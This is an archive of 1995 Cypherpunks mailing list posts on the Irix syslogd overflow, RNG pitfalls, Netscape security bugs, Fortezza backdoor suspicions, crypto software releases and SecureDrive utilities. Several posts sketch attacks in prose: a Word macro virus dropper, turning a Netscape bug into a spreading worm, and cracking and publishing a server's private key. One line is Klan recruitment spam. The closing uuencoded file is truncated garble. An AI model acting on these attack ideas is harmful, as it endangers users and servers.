>> very big, and you can do what you like. The 8lgm people wrote a demo
>> for Sparc as a proof of concept.
> Hmm, after having looked at the syslogd code, it looks like this
> particular bug has been fixed for at least several years. However,
> there sure are a hell of a lot of fixed size buffers being allocated off
> the stack and some of them are being used in unsafe ways.

Whoops. Having done a little more checking, it appears that this bug does indeed occur in all current versions of Irix. There's a patch for it (patch 825) that will be out imminently.

--
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything. -- Washington DC motto | tomw at engr.sgi.com

From crocker at cybercash.com Fri Sep 22 17:52:27 1995
From: crocker at cybercash.com (Stephen D. Crocker)
Date: Fri, 22 Sep 95 17:52:27 PDT
Subject: Pitfall in producing random numbers
Message-ID:

At 2:20 AM 9/22/95, Norman Hardy wrote:
> The virtual PC clock proceeded forward in a very predictable
> manner. Perhaps the details were different but the nature of the pitfall is
> clear. I did not notice that pitfall mentioned in RFC 1750. (It's the only
> hazard that I know of that they missed.)

Neat! I often talk about what happens if inter-keystroke timing is used but the program is driven by a script. In essence, running a program under simulation amounts to running the clock under a script. Next version.

Thanks,
Steve
--------------------
Steve Crocker Main: +1 703 620 4200
CyberCash, Inc., Suite 430 Desk: +1 703 716 5214
2100 Reston Parkway Fax: +1 703 620 4215
Reston, VA 22091 crocker at cybercash.com

From aleph1 at dfw.net Fri Sep 22 17:53:21 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 22 Sep 95 17:53:21 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID:

Actually it allows you to imbed data and commands to run. What the latest MSWord virus did is imbed a virus dropper encoded in the word document and then run it through the dos debug command to make it a binary file (if you ever read the 40HEX virus magazine you should know how this works).
From there it just ran the dropper.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

On Fri, 22 Sep 1995 dmandl at panix.com wrote:

> Is that the new MS-Word you're thinking of? I hear that it lets you
> embed macros containing executable code in documents. That's got to
> be one of the most dangerous ideas ever cooked up.
>
> --Dave.
>
> --
> Dave Mandl
> dmandl at panix.com
> http://wfmu.org/~davem
>


From tcmay at got.net  Fri Sep 22 18:27:21 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 22 Sep 95 18:27:21 PDT
Subject: "Going after Netscape"
Message-ID:

At 12:37 AM 9/23/95, Jim Ray wrote:

>I'm with Lucky, let's go after Netscape itself. They deserve it more
>than their customers do, and they would then have a strong motivation
>to fix it. The press release would then *only* involve
>Netscape, and maybe a few C-punks could buy a few Netscape puts ;)
>and donate the bucks made for something like Tim's stable remailer.

I think we need to be very careful not to do things like we have a vendetta against Netscape. Netscape has a Cypherpunks presence, of course, and His Andreeseeness was even on the list for a while last December.

Today's "San Jose Mercury News" had a photo of Goldberg and Wagner and a fairly long article about how James Barksdale, Pres. of Netscape, plans to hire them to help improve Netscape's security. He even made noises about thanking them for their cracking efforts, and said improving Netscape's security is a high priority.

It's sort of hard for me to imagine a company being more "Cypherpunks friendly" than this. (I mean about the issues that interest us.)

So, keep on "attacking" Netscape (kudos to Ray, by the way, though I've seen Netscape bomb on certain sites, as with the Cypherpunks archive site, as several of us noted a few months ago...probably a different problem, but indicative that Netscape can be corrupted).
But let's be careful not to convey any flavor of this being a vendetta.

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."


From herbs at interlog.com  Fri Sep 22 18:32:03 1995
From: herbs at interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 18:32:03 PDT
Subject: WordBasic and other macro languages
Message-ID: <199509230130.VAA04956@gold.interlog.com>

At 15:47 1995.09.22 -0400, dmandl at panix.com wrote:

>On Fri, 22 Sep 1995, Adam Shostack wrote:
>> I keep hearing this thought. Isn't Win95 with its
>> 'executables in email' much more dangerous than Java, which at least
>> tries to address security?
>
>Is that the new MS-Word you're thinking of? I hear that it lets you
>embed macros containing executable code in documents. That's got to
>be one of the most dangerous ideas ever cooked up.

It's no worse than the other hundreds of products that have macro languages that can write files (even the ones that can't execute other programs are dangerous if they can write a real executable to a file and, say, add a corresponding RUN= line in a WIN.INI or the equivalent to get it executed later). Word's is just more visible because the macro itself can behave like a virus, because of Word's autoexec-macro feature that can make the macro run automatically unless the user disables those options on his copy.

Many versions of PostScript have this kind of hole, I understand; some disable the file-manipulation commands to be more secure.
I remember hearing recently that Ghostscript, popular on PCs, is one that does have the file-manips, but all of this is hearsay so I can't say for sure.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102        voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2   fax   (905) 847-6019


From herbs at interlog.com  Fri Sep 22 18:33:29 1995
From: herbs at interlog.com (Herb Sutter)
Date: Fri, 22 Sep 95 18:33:29 PDT
Subject: Notes security question
Message-ID: <199509230133.VAA05532@gold.interlog.com>

While I'm at it, here's a question I've been wondering about recently: Why is it I've never heard of any security issues with Lotus Notes? Are there no known weaknesses? Or did existing weaknesses just not get much press because Notes isn't a commercially visible consumer product like Netscape?

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102        voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2   fax   (905) 847-6019


From tcmay at got.net  Fri Sep 22 18:45:16 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 22 Sep 95 18:45:16 PDT
Subject: More on "Entropy"
Message-ID:

At 6:46 PM 9/22/95, David Van Wie wrote:

>Having overcome my initial skepticism on the entire topic of entropy, based
>on the useful pointers to the literature I have received, I agree
>wholeheartedly with the need for _positive_ design criteria against which
>designs may be evaluated. For initial consideration, I recommend the
>following:
>
>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Hah! Another physicist converted to the information-theoretic view of entropy!

I should've pointed out in my reading list that several names stand out in this interpretation:

- Charles Bennett
- Rolf Landauer
- John Wheeler

Just so you know.

ObNetscapeHack: None.
--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."


From aleph1 at dfw.net  Fri Sep 22 19:37:44 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 22 Sep 95 19:37:44 PDT
Subject: Council of Europe proposes to outlaw strong encryption (fwd)
In-Reply-To: <199509221509.LAA09991@panix.com>
Message-ID:

I'll jump into this conversation for a second. I've been wanting to set up an IP proxy using Linux. It has support for IP over IP tunnels, and IP Masquerading. The only thing needed is to encrypt the IP over IP tunnel.

Just my $0.02.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

On Fri, 22 Sep 1995, Duncan Frissell wrote:

> This should prove about as effective as the current French or Russian bans.
> What are they going to do when they figure out that there need no longer be
> such a thing as a telecoms operator. We do most of the message packaging
> ourselves. It will be a bit difficult for any connectivity supplier to tell
> what's going out via one of our encrypted IP sessions.
>
> Question for Perry -- I'm assuming that it will soon be possible to
> originate encrypted TCP/IP sessions with a distant "process" somewhere. Do
> you see technical problems with a TCP/IP laundry being established
> "somewhere" that strips trace info from one of my processes and prevents
> back tracing beyond the mouth of this encrypted pipe?
>
> Also Perry, what did you think of the article "How Anarchy Works" in the
> latest Wired on the IETF?
>
> DCF
>


From tcmay at got.net  Fri Sep 22 19:41:09 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 22 Sep 95 19:41:09 PDT
Subject: T-Shirt Spams
Message-ID:

At 3:42 PM 9/22/95, Don Henson wrote:

>By now, everyone knows about the TSHIRT that has been classified as a
>MUNITION by the US Government. If you don't know, just send email to

Oh, really? Which government agency declared this t-shirt to be a munition? Inquiring minds want to know.

(I wouldn't say more, except these t-shirt spams are getting wearisome.)

--Tim May

Notice: Don't expect me to reply to trivial questions and complaints.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."


From bugs at ritz.mordor.com  Fri Sep 22 20:15:36 1995
From: bugs at ritz.mordor.com (Mark Hittinger)
Date: Fri, 22 Sep 95 20:15:36 PDT
Subject: another net phone (crypto)
Message-ID: <199509230313.XAA08112@ritz.mordor.com>

I haven't seen this on the cypherpunk list so I thought I would forward it as an FYI. Interesting that source code is available!

>Subject: FWD: Free secure Internet voice communication
>From: John Walker
>Subject: Free secure Internet voice communication
>
> I've just released to the public domain Release 5 of Speak Freely for
> Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics
> workstations. Assuming you have a fast enough connection to the
> Internet (with reasonably consistent packet delivery time) and/or a
> fast enough CPU to perform audio compression in real time, you can
> talk to anybody on Earth connected to the Internet who's also running
> the program.
> The Windows and Unix versions have entirely different
> user interfaces, but can intercommunicate. Complete source code is
> available.
>
> For communications security, IDEA, DES (less initial and final
> permutations), and one-time pad (re-used for each sound packet)
> encryption are available. The intensely paranoid can enable any
> combination of these. The documentation explains how to use PGP to
> securely exchange session keys before a conversation; an automatic
> session key generator is provided. DES is included for commercial
> users who don't have a license to use the IDEA patent. One-time pad
> encryption is for those with machines too slow to run IDEA or DES in
> real time.
>
> I didn't include a public key mechanism because I wanted to avoid all
> the confusion. If somebody wants to navigate the narrow strait
> between the RSA patent Scylla and Charybdis of export controls, the
> programming work to implement public keys is straightforward and the
> source code is yours to hack.
>
> For further information, see:
>
> http://www.fourmilab.ch/netfone/windows/speak_freely.html
>
> which describes the Windows version in detail and contains pointers to
> the Sun and SGI editions, as well as links to download source code and
> a ready-to-run executable for Windows. You can also obtain the
> program by anonymous binary FTP:
>
> Unix source code:
> ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz
>
> Windows executable:
> ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip
>
> Windows source code (for Visual C 1.5):
> ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip
>
> Have Fun!

Regards,

Mark Hittinger
Internet Manager
WinNET Communications, Inc.
bugs at win.net
bugs at ritz.mordor.com


From smart at mel.dit.csiro.au  Fri Sep 22 20:20:29 1995
From: smart at mel.dit.csiro.au (Bob Smart)
Date: Fri, 22 Sep 95 20:20:29 PDT
Subject: speak freely
Message-ID: <199509230320.AA01298@shark.mel.dit.csiro.au>

"One Time!
This must be some new meaning of `one time' that I'm not acquainted with." - apologies to Douglas Adams.

------- Forwarded Message

Date: Fri, 22 Sep 95 16:11:20 PDT
From: ari at es.net (Ari Ollikainen)
Message-Id: <9509222311.AA27810 at viipuri.nersc.gov>
To: RCWG at nic.hep.net, ESCC at viipuri.nersc.gov
Subject: FWD: Free secure Internet voice communication
Cc: rem-conf at es.net, videophone at es.net

Found in my mailbox...

From: John Walker
Subject: Free secure Internet voice communication

I've just released to the public domain Release 5 of Speak Freely for Windows and its Unix counterpart, Netfone for Sun and Silicon Graphics workstations. Assuming you have a fast enough connection to the Internet (with reasonably consistent packet delivery time) and/or a fast enough CPU to perform audio compression in real time, you can talk to anybody on Earth connected to the Internet who's also running the program. The Windows and Unix versions have entirely different user interfaces, but can intercommunicate. Complete source code is available.

For communications security, IDEA, DES (less initial and final permutations), and one-time pad (re-used for each sound packet) encryption are available. The intensely paranoid can enable any combination of these. The documentation explains how to use PGP to securely exchange session keys before a conversation; an automatic session key generator is provided. DES is included for commercial users who don't have a license to use the IDEA patent. One-time pad encryption is for those with machines too slow to run IDEA or DES in real time.

I didn't include a public key mechanism because I wanted to avoid all the confusion. If somebody wants to navigate the narrow strait between the RSA patent Scylla and Charybdis of export controls, the programming work to implement public keys is straightforward and the source code is yours to hack.
For further information, see:

http://www.fourmilab.ch/netfone/windows/speak_freely.html

which describes the Windows version in detail and contains pointers to the Sun and SGI editions, as well as links to download source code and a ready-to-run executable for Windows. You can also obtain the program by anonymous binary FTP:

Unix source code:
ftp://ftp.fourmilab.ch/pub/kelvin/netfone/netfone5.tar.gz

Windows executable:
ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfb.zip

Windows source code (for Visual C 1.5):
ftp://ftp.fourmilab.ch/pub/kelvin/netfone/windows/speakfs.zip

The Sun and SGI versions of this program are quite stable, and should work for just about anybody with an adequate network connection. Porting the code to other Unix workstations with audio hardware should be relatively straightforward.

The Windows version has just been finished and until it's shaken down on a variety of machines, networks, sound cards, etc. may not work for everybody. The Windows version requires a sound card with Windows Multimedia drivers (I've tested it on a variety of Sound Blasters of various generations) and a TCP/IP stack that supports WINSOCK (I'm using NetManage Chameleon NFS). Since multimedia and network hardware and drivers vary tremendously from machine to machine, I wouldn't be surprised if some tweaking were needed for various configurations.

The CPU speed required interacts with the speed of your network connection; if you have a high-bandwidth connection to the Internet, or you're talking to another person on a high-speed LAN, there's no need to compress sound and the CPU load is minimal; just about any machine will do. If you need to compress in order to squeeze 8000 samples per second into a dial-up connection, then you need a CPU fast enough to run GSM compression in real time: basically we're talking a very fast 486 or Pentium. If you turn on IDEA and/or DES encryption, that also consumes CPU time.
Based on my experience with other Windows programs, it will probably take months to track down misbehaviour due to strange hardware and software configurations. Complete, detailed bug reports are welcome. I may not be able to respond individually, but the Web page will track updates as they're released. I have tested the program only on vanilla 16 bit Windows 3.1.

The Windows version contains preliminary code to support direct dial-up modem connections, acting as a phone scrambler. Serial port support in most Windows machines is so poor (unless you have a 16550A UART and appropriate drivers, which most people don't) that this feature isn't usable at present. I've left the code in just in case somebody with suitable hardware wants to bash it into working form.

If you add features, port the program to 32 bits, fix bugs, etc., let me know so I can make your contributions generally available.

-------------------- -------------------
John Walker                    | A sufficiently advanced
Internet: kelvin at fourmilab.ch | technology is indistinguishable
                               | from a rigged demo.

------- End of Forwarded Message


From jcorgan at aeinet.com  Fri Sep 22 20:35:47 1995
From: jcorgan at aeinet.com (jcorgan at aeinet.com)
Date: Fri, 22 Sep 95 20:35:47 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID:

> Irregardless, it's a nasty bug given that you can crash anyone's
>netscape. And on Mac/Win3.1, it may even require a reboot.

Testing here with Win95 results in the equivalent of a segmentation fault...nicely handled.


From gnu at toad.com  Fri Sep 22 21:00:41 1995
From: gnu at toad.com (John Gilmore)
Date: Fri, 22 Sep 95 21:00:41 PDT
Subject: The Fortezza random number generator is not trustworthy
Message-ID: <9509230400.AA19805@toad.com>

> Yes Fortezza cards can be instructed to produce a random number through one
> of its library calls (someday they'll have a real API). One of the
> diagnostic tools I had tested this function. What algorithm do they use?
> Haven't a clue.
> Sources say that the RNG implementation may vary from vendor
> to vendor (i.e., GTC, Spyrus, Mykotronix, etc.).

A caution. I believe that CAPSTONE chips inside the Fortezza card are highly likely to have back doors in them, above and beyond the Clipper key escrow feature. In particular, the random number generator is probably compromised.

Many of the top-secret NSA documents I have received under FOIA about Clipper say things like:

    "2. I briefed the Board on the CLIPPER and CAPSTONE chips and their
    capabilities and summarized the recommendations of the 19 November
    session:

    [TWO INCHES OF SOLID BLACKOUT]

    "3. The Policy Board reached consensus on the following points:

    [TWO LINES BLACKED OUT]

    a. NSA will provide for the availability from a vendor of a single
    chip which can be programmed for law enforcement access exclusively
    through a key escrow "law enforcement exploitation field." The chip
    will have no trap doors or other methods of access. This chip is
    called CLIPPER.

    [THREE INCHES OF SOLID BLACKOUT]

Note that they explicitly say "The chip will have no trap doors or other methods of access" when talking about Clipper, but all information about Capstone is blacked out. There's no such guarantee about Capstone.

The Digital Signature Algorithm embedded in Capstone is the best "host algorithm" ever seen for subliminal channels. A subliminal channel is a means of communication which imparts information but cannot even be detected by third parties. By choosing numbers for DSA signatures that are not completely random, several subliminal channels are available, which can leak information as part of normal digital signatures. This subliminal information can only be read by someone who knows a secret about how the non-random numbers were generated. Gus Simmons, who did seminal work on subliminal channels while at Sandia Labs, wrote a Eurocrypt paper on this a year or two ago.
The Capstone chip knows private things like your DSA private key, the last session key you loaded for Skipjack, etc. So it has info that is worth leaking to NSA wiretappers.

Now the plot thickens. I submitted a FOIA request for all information the NSA had on subliminal channels. They responded that they had no information! We appealed and got the same answer. However, subliminal channels are clearly part of the crypto literature and knowledge base. They were a major concern when Gus designed nuclear test-ban verification crypto equipment in the '70s.

The ONLY way NSA can legally claim to have no information on subliminal channels is if the MERE FACT OF THE EXISTENCE AT NSA of information on subliminal channels is classified. In other words, if their information ABOUT subliminal channels is classified, they can't say they have no documents; they have to say, e.g. "We have ten documents and they're all classified." If they have any documents, they can only legally claim to have no documents if just confirming the existence of the documents would itself reveal classified info.

This is called "Glomarizing" and it's named for the Glomar Explorer, a ship which was secretly used for dredging up code books from sunken Soviet submarines. Merely confirming that records existed on the Glomar would have revealed classified information (i.e. that the government was involved; the cover story was that a private company was using it for deep-sea mining experiments).

Apparently, merely confirming that NSA knows anything about subliminal channels would reveal classified information. If the mere existence of documents on subliminal channels is classified, it's probably because they are very actively and very secretly using them. And this tends to reinforce my perception that they are using them in Capstone, the heart of the Fortezza card.

You're free to dismiss all this as paranoid rambling.
However, if you use a Fortezza card to generate your random numbers, you have no way to determine how these numbers are being generated. Are they really random? How could you tell? Would you rather get "random" numbers from a classified NSA-designed chip that's part of a family designed to subvert your privacy? Or would you rather get them from a third-party product whose design you can actually verify?

I'd prefer a random number generator where I can pull one "at random" from stock, take it apart, and verify that it really does what its designers say it does.

John Gilmore


From hallam at w3.org  Fri Sep 22 21:42:57 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 22 Sep 95 21:42:57 PDT
Subject: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To:
Message-ID: <9509230442.AA07912@zorch.w3.org>

>Has anyone already created the necessary patches for Apache
>, or does anyone know whether the Apache dev
>team would be amenable to including conditional directives to allow the
>build of a secure version? If anyone is thinking of making the effort
>to create a publicly available secure server, Apache's probably the
>best source base to work with.

I can't speak for Apache but we have two of the developers in the building here. From what they have said security patches would be welcomed with open arms. If anyone wants to do the same for the CERN server, we can roll it out through W3C likewise.

The real issue though would be whether there was confidence in the security of the system. Simply bolting SSL in in a cack-handed manner would not cut it IMHO. Basically I would not recommend a release of such a system to the Apache group unless I was happy with the security of the whole system. This may well involve a number of fixes in the rest of the code.

I'm also very interested if anyone wants to brave S-HTTP, there is a public domain version in production.

Basically the more people want to work on this type of stuff the better.
The main hassle is in programming the authorization stuff however... don't underestimate the amount of work involved in doing a good job there.

Phill


From rjc at clark.net  Fri Sep 22 22:16:31 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 22:16:31 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID: <199509230513.BAA23938@clark.net>

>
> Actually it allows you to embed data and commands to run. What the latest
> MSWord virus did is embed a virus dropper encoded in the word document
> and then run it through the dos debug command to make it a binary file
> (if you ever read the 40HEX virus magazine you should know how this works).
> From there it just ran the dropper.

You could make a worm out of this Netscape bug by having it look for a user's homepage when it infects, and then inserting the URL into that page.


From jsw at neon.netscape.com  Fri Sep 22 23:01:03 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Fri, 22 Sep 95 23:01:03 PDT
Subject: The Next Hack
In-Reply-To: <199509211832.LAA24086@infinity.c2.org>
Message-ID: <4407p5$on4@tera.mcom.com>

In article <199509211832.LAA24086 at infinity.c2.org>, sameer at c2.org (sameer) writes:

> Now that we've seen that Netscape is doing a good job towards
> trying to fix the hole that Ian and David have uncovered, it's time to
> start looking at new things.
>
> Given the recent post to the www-security list that was
> forwarded here, it seems like just replacing the server may not work
> for all the secure servers out there-- keys may have to be replaced as
> well. Let's find out.
>
> Proposal for action:
>
> 1) Reverse-engineer a server to see if the keygen phase uses
> a weak RNG seed. -- if so, determine the exact algorithm.
>
> 2) Organize a net-wide search over the space of the RNG seed to
> crack the private key of some well known secure server.
>
> 3) Release the private key to the net.

What exactly is the point of this?
We have:

1) acknowledged that the RNG used in the server private-key generation has the same problem
2) said that we will provide a patch early next week
3) said that we will provide new certificates for all customers
4) promised to make source code for our new seed generation code publicly available

What else do you hope to gain by breaking a server key? I think the point has been made. Is there anything else that you would reasonably expect that we would do in response to a server key being broken that we have not already done?

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.


From pierre at shell.portal.com  Fri Sep 22 23:37:50 1995
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Fri, 22 Sep 95 23:37:50 PDT
Subject: Project: a standard cell random number generator
Message-ID: <199509230636.XAA25093@jobe.shell.portal.com>

At 9:50 PM 9/20/95, John Gilmore wrote:

>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably! It will take designing a new circuit structure.

Actually, even without going into the more analog characteristics of these same standard cells (as Tim suggests: threshold measurement, DRAM discharge time, and so on) you can do that using the really basic behavior of really basic standard cells: I did that some 8 years ago around a free-running ring oscillator (a bunch of basic logic gates in a ring).

The problem I would look into first is that any such random number generator (even the ones based on measurements of analog quantities) would likely synchronize to some extent to the local noise (like CMOS switching noise in sync with the chip clock).
My impression is that if you try and make the thing more impervious to noise, it will be less random too, and the most prominent noise in such chips is not random at all. So, you could try to make it run fast, and place it in a slow chip (like an older style UART), or you could try to kick it out of sync now and then based on some external conditions (maybe) (bus signal arrival time, serial line input, etc). It's not guaranteed it would end up generating anything useful (maybe not even to seed a software PRNG).

I still like the idea of using macroscopic events, many orders of magnitude different from system operating frequencies: mouse location and timing sounds good. If you want to get large amounts of random numbers, use a specially designed separate box, well shielded, and running on batteries (like a walkman :-)

And a cryptographically secure software hash is always necessary.

Pierre.
pierre at shell.portal.com


From rooster at ix.netcom.com  Sat Sep 23 01:48:01 1995
From: rooster at ix.netcom.com (BRIAN PROBST )
Date: Sat, 23 Sep 95 01:48:01 PDT
Subject: No Subject
Message-ID: <199509230847.BAA22935@ix8.ix.netcom.com>

IN TOUCH TO THE LOCAL KLAVERN IN THE DALLAS AREA? IF SO THEN SEND ME E-MAIL AT: ROOSTER at IX.NETCOM.COM


From edgar at highnrg.sbay.org  Sat Sep 23 02:26:21 1995
From: edgar at highnrg.sbay.org (Edgar Swank)
Date: Sat, 23 Sep 95 02:26:21 PDT
Subject: SecureDrive/Secure Device News
Message-ID: <79BVBD6w165w@highnrg.sbay.org>

-----BEGIN PGP SIGNED MESSAGE-----

My thanks to Mark Grant who suggested re the Iomega zip Drive & Secure Device:

On Sat, 16 Sep 1995, Edgar Swank wrote:

>problem is that the DOS file must be present when the CONFIG.SYS
>DEVICE= statement for the SECDEV.SYS is processed. But the zip drive
>driver is a TSR that doesn't get loaded until after all DEVICE
>statements have been processed.
There are programs around that will load DOS device drivers from the DOS command line after booting, there's one I've used at work called 'DEVLOD', but I don't know if it's commercial or freeware. If it's free it may be possible to find it on the Net somewhere.

I found several shareware/freeware programs which claim to have this ability. The first one I tried,

DMC35.ZIP     74710  11-29-93  Allows loading/unloading of dev. drivers /TSR's

did the job, loading SECDEV.SYS -after- the zip drive TSR was loaded. Other possibilities, which are present in the SIMTEL archive in the msdos/sysutil subdirectory would be,

comp.zip       5086  08-29-88  Load and unload device drivers after bootup
devic104.zip   7250  05-30-92  Load and unload device drivers after bootup
devlod.zip    18240  12-30-91  Dynamic load of device drivers after boot-up
drvins11.zip  12298  12-06-90  Load and unload device drivers after bootup
idrv01.zip    16369  04-10-92  Install/uninstall device drivers after bootup

although I haven't tried any of these.

- From a SecureDrive user comes the following warning:

Norton Utilities' wipeinfo appears to CORRUPT a SecureDrive (1.3d) partition, as well as an SFS (1.17) one. That was with the F-PROT (2.19) anti-virus TSR in memory (virstop.exe). I did not encounter problems with it off. I think the main fault would be with virstop.

The user didn't say, but if virstop is loaded before sectsr, that could lead to bypassing sectsr, accessing encrypted data directly, which is likely to corrupt the whole partition.

A user has also informed me that RAWDSK11 (or RAWDRV11) is no longer found at ftp.uni-duisburg.de: /pub/pc/misc/rawdsk11.zip

This is a utility useful with SecureDrive for tape backups. Since it's a short program, I'll include a UUENCODED image of the file here. This program does not do cryptography by itself, so ITAR does not apply.

Edgar Swank
SecureDrive Co-author

section 1 of uuencode 5.25 of file rawdrv11.zip by R.E.M.
M"JUYYI(TR.==;8HV0LP1#-Y="IHC.1S]';4) M6!0!V23=DO;JMTC2X"'4)RY_-55[X>"<*IL,U7/B_[N3.,?YWXVIB0/J:ZV) M&[U_)GL\^:^\^5WNW\PWZ]_E#_.FLB=Y8_VZJ;?S'!/ZO$9?,>-4U_?A/4RS>8627;YM-NK&.KI_)#&;+-D( MLF at M`E'9")]V_22R;MJ=C1^>>4$1G7>F5`5]>\F;9LX]YW?N/?=WS[WG M3F5\2/8'XB>"*'286ZW./?#?GTI7QK*E^E(@@0!B+8)/_M/HHTJ_ M>N>>$JNCI=;<7&I at 6=8.*9!%,.-U7P(*4MHKO[FY8*6?7.Z'?O at _?_1]=`[H M>_*RX/:"OD^S$0$MBP"7!_J/M1MAY`[Q[$P>?4B3/X9]N`D;!<#UVDAC)D]* M^8,P??]:+DD]D8L^I!M)-ZDC#^.K_,Y1MU7#!CH^1W&GFBBJ6Y%`>-+SSRY@ M8)PBC%,\N\V-VS0$AEUS$[B^IG72CZAGV14]1[H3K-H`$,CFPK8L!G"MUY$=3/SAB+H_6=O?,?U:)S,G.S5O@,1,XSEF6"0G,KF M*>E at OU3>'T8V)ES%ZOAGQ%P]$E;H*:R$U?%A8JX\A<3KR#E=2D\X9+MCN(&. M?TFVN?1*WNW1>(8:NCG&1KEV_,SUV+*2L'XI09F8,VTR?^L3G[[XWTG:1[\O M:50R:?M6)JV-F-NU,FDMQ%S)RZ0=(N8*7B?M=Z;JR/-A#QVW$(GVY_OL5P#& MJDS0. at 3$XN,!=^MH#0Q5P>,+[E,3+X at K^R\-G**1$!G4[@)P51^HCREL<(W] M\-98E[VUN^HB/!2*@E51G#,]6!4#$'(KZ8, at I&$G21765$!=]'Y&]<"#Q66! MW2X3`0&U_5P;7+HBRY<&7%*Q,BJP:2G at QA4!-4J4^NE9ZBDWD2;+2$J@$IUR M["U"HQ_!4#6NY38,)@N/LXN,+^6]& M&F2F"F+[AE1 at +UH#JNW&/_&D*ET?JH6]KFA<]2!Q(*;.?'F/5^WW'_9WG?!; M_M)1N`QU>#T=-3S?Q2\'6WF?X&WQ\KX/3A;&;Q"#?YPJZ,G30A^]'I1-C<>( M8VS\.R)U-6E`V=BUJ.42L'3K)/[Q+.)@Q`T0J6-6=Y_'P[:;0>K"+;$(1#=$ M&I+6B+ at 9Q/<@8D]:EW5T(_.WKZK%33#/%>&+SF+HP9,];RB%";H,OR.X3_R6 M::X,3"3P^4E%!;PVJ60`KTXJ:X%7*4JD#,X[8`R+HN_&O*$,2TP at JL5R2",Q M^$Z,:D]!!Z&Z6JQ$'C`=%RL at 4@Y*P51`\`;9HTW:\QB.4 at IR)EF0.(P1OL/J9#^#(3T(Q"=36,TIX'17(7!=Z<*0MJS$-)^#Z<2(^G3LR'-YQ#2C,*. MF>BO%(,N!EW)/1BWJ97+7/,AG=J(K&#R*E_:DL3"T[Y;']\;;F:2YV4XLM1R M8W_/^F;;(M=M4@?()['+ at 7^-_I+1^D5 at 7;>1$$S=1EDH[#:"4!SXS:VT:@7. 
